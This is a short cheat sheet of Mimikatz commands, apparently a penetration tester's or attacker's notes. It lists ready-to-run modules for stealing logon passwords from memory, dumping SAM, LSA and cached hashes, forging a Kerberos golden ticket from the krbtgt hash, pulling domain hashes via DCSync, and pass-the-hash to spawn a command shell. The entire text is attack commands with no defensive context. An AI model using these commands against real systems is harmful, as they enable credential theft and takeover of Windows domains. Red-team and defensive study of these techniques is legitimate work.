Mimikatz
Steal creds
- privilege::debug
- sekurlsa::logonpasswords
Dump Hashes
- token::elevate
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Create a golden ticket on DC
- privilege::debug
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user: /domain: /sid: /krbtgt: /id:
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:
Pass the Hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd